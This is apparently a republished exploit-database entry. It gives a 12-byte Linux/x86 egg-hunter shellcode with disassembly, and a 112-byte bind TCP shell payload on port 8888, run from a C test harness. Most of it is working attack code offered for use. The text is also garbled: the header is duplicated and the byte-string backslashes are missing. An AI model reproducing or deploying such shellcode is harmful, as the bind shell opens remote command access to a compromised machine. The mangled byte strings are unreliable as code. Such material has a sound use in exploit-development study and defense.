/*
Title: Linux/x86 - EggHunter Shellcode (12 Bytes)
Description: Smallest Null-Free Egg Hunter Shellcode - 12 Bytes
Date : 14/Jan/2018
Author: Nipun Jaswal (@nipunjaswal) /*
Title: Linux/x86 - EggHunter Shellcode (12 Bytes)
Description: Smallest Null-Free Egg Hunter Shellcode - 12 Bytes
Date : 14/Jan/2018
Author: Nipun Jaswal (@nipunjaswal) ; SLAE-1080
Details:
1. Works with an executable EGG
2. Make sure you clear EDX, EAX registers in the shellcode before any other operations
*/
/*
EGG Hunter Disassembly:
Disassembly of section .text:
08048060 <_start>:
8048060: ba 90 47 90 4f mov edx,0x4f904790
08048065 <loop>:
8048065: 40 inc eax
8048066: 39 10 cmp DWORD PTR [eax],edx
8048068: 75 fb jne 8048065 <loop>
804806a: ff e0 jmp eax
*/
#include <stdio.h>
#include <string.h>
#define EXECEGG "x90x47x90x4f" //Executable EGG
unsigned char egg_hunter[] =
"xbax90x47x90x4fx40x39x10x75xfbxffxe0"; //EggHunter 12 Bytes
unsigned char egg[] =
EXECEGG
// Bind TCP Shell 112 Bytes Port 8888
"x31xdbx31xc0xb0x66xfexc3x56x6ax01x6a"
"x02x89xe1xcdx80x97x56x66x68x22xb8x66"
"x6ax02x89xe3x6ax10x53x57x31xdbxf7xe3"
"xb0x66xb3x02x89xe1xcdx80x56x57x31xdb"
"xf7xe3xb0x66xb3x04x89xe1xcdx80x31xdb"
"xf7xe3x56x56x57xb0x66xb3x05x89xe1xcd"
"x80x93x31xc9xb1x02xb0x3fxcdx80x49x79"
"xf9x31xc0x50x68x2fx2fx73x68x68x2fx62"
"x69x6ex89xe3x89xc1x89xc2xb0x0bxcdx80";
void main()
{
printf("Length of Egg Hunter Shellcode: %d
", strlen(egg_hunter));
printf("Length of the Actual Shellcode: %d
", strlen(egg));
int (*ret)() = (int(*)())egg_hunter;
ret();
}
Linux x86 Egghunter Shellcode
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 436